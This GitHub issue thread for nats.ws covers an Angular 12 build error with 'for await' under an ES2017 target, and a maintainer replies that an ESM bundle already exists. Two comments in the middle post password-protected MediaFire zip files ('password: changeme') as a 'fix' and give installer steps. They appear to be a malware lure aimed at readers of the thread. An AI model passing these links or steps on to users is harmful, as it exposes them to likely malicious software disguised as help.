### ISSUE TITLE
Support for ECMAScript Modules ES2017 and Later

### ISSUE THREAD

**Issue by Ramesh-Mu** [nats-io/nats.ws#257]
### Proposed change

nats.ws should support ECMA Script module ES2017 and later

### Use case

I have integrated nats.ws with Angular 12. When I set the target to ES2017 or later in tsconfig, it throws an error. Using a lower version of ES modules may prevent fully leveraging the latest ECMAScript features, potentially resulting in less efficient performance optimizations and limited utilization of new features.

```
./node_modules/nats.ws/esm/nats.js:7472:16 - Error: Module parse failed: Unexpected token (7472:16)
File was processed with these loaders:

./node_modules/@angular-devkit/build-angular/src/babel/webpack-loader.js
./node_modules/@ngtools/webpack/src/ivy/index.js
You may need an additional loader to handle the result of these loaders.
| _asyncToGenerator(function* () {
| try {
        for await (const b of _this12.transport) {
| _this12.parser.parse(b);
| }
```

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aricart** [comment]
it actually does - and it is bundled with an esm file already 

https://github.com/nats-io/nats.ws/blob/40f64a842e34f2b02fdd9acb473a26922fcf0fba/package.json#L10
